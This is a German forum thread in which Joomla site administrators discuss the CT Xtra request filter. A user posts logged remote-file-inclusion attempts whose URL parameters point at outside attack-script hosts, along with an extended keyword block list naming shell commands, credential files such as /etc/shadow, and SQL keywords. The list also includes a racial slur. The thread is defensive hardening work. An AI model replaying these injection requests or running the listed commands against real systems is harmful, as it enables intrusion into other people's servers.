Danke und $wormprotector-Erweiterung

[DIsenbart]

Hi,

erst mal herzlichen Dank für die super Arbeit.

Ich habe den stand alone CT Xtra in mehreren Jooomla- und anderen Websites integriert. Funzt prima.

Da ich schon seit längerem ebenfalls den Page Restrictor(BotTrap) integriert habe, ist mir in den Logfiles aufgefallen, dass der stand alone CT Xtra folgendes allerdings nicht blockiert:

03.05.2007 19:04:39 - 82.165.250.70 u15172580.onlinehome-server.com - libwww-perl/5.65 -  - www.mgi-mambo.de/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.injek.cc/xpl/morgan.do?? - ua - libwww-perl

(by the way: weiß einer, was mit obigem Angriff überhaupt bezweckt wurde?)

Der Angriff wurde hier aber vom Page Restrictor abgefangen, da von ihm die entsprechende IP geblockt wird. Sonst wäre er durchgeschlüpft. Allerdings gibt es unter der URL gar keine Joomla/Mambo-Installation und somit auch keine com_content. Also ein sinnloser Versuch von dem Vollpfosten (wahrscheinlich Script-Kiddie).

Um aber ein Risiko für meine Joomla-Installationen zu minimieren, habe ich deshalb die ctracker.php um folgende Einträge erweitert*:

   $wormprotector = array('chr(', 'chr=', 'chr ', ' chr', 'wget ', ' wget', 'wget(',
       'cmd=', ' cmd', 'cmd ', 'rush=', ' rush', 'rush ', 'union ',
       ' union', 'union(', 'union=', 'echr(', ' echr', 'echr ', 'echr=',
       'esystem(', 'esystem ', 'cp ', ' cp', 'cp(', 'mdir ', ' mdir',
       'mdir(', 'mcd ', 'mrd ', 'rm ', ' mcd', ' mrd', ' rm',
       'mcd(', 'mrd(', 'rm(', 'mcd=', 'mrd=', 'mv ', 'rmdir ',
       'mv(', 'rmdir(', 'chmod(', 'chmod ', ' chmod', 'chmod(', 'chmod=',
       'chown ', 'chgrp ', 'chown(', 'chgrp(', 'locate ', 'grep ', 'locate(',
       'grep(', 'diff ', 'kill ', 'kill(', 'killall', 'passwd ', ' passwd',
       'passwd(', 'telnet ', 'vi(', 'vi ', 'insert into', 'select ', 'nigga(',
       ' nigga', 'nigga ', 'fopen', 'fwrite', ' like', 'like ',
       '$_get', '$request', '_request', '$_request', '$get', '.system', 'http_php', '&aim', ' getenv',
       'getenv ', 'new_password', '&icq', '/etc/password', '/etc/shadow', '/etc/groups', '/etc/gshadow',
       'http_user_agent', 'http_host', '/bin/ps', 'wget ', 'uname\\x20-a', '/usr/bin/id', '/bin/echo',
       '/bin/kill', '/bin/', '/chgrp', '/chown', '/usr/bin', 'g\\+\\+', 'bin/python',
       'bin/tclsh', 'bin/nasm', 'perl ', 'traceroute ', 'ping ', '.pl', '/usr/x11r6/bin/xterm',
       'lsof ', '/bin/mail', '.conf', 'motd ', 'http/1.', '.inc.php', 'config.php',
       'cgi-', '.eml', 'file\\://', 'window.open');

Nun wird das auch geblockt:

erster Angriff:   am 07.05.2007 um 11:05:53
Angriffe in Stunde 11   2
QUERY_STRING   _request=
REMOTE_ADDR   67.36.142.66
HTTP_USER_AGENT   libwww-perl/5.805
HTTP_REFERER   
CONTENT_TYPE   
HTTP_COOKIE   
SERVER_PROTOCOL   HTTP/1.1
REQUEST_METHOD   GET
REQUEST_URI   /index.php?_REQUEST=

Das wars erst mal meinerseits. Wenn ich noch was finde, meld ich mich wieder.

MfG

Dietmar

[Nordin]

@DIsenbart

Riesen Dank! Ich werd es nachher gleich einbauen und sicherheitsupdate rausbringen...

PS: was es mit dem angriff auf sich hat weiß ich leider auch nicht wirklich.

[DIsenbart]

Hi,

hier ein neuer Angriffsversuch:

09.05.2007 17:08:45 - 212.12.121.43 as01-14-212-12-121-43.ip.housing-manager.de - libwww-perl/5.803 -  - di-side.de/index.php?side=http://64.38.11.130/~marzoky/images/kgb.c? - ua - libwww-perl

ka, was dabei abgeht, aber _side & side hab ich bei mir im $wormprotector vorsichtshalber eingetragen.

MfG

Dietmar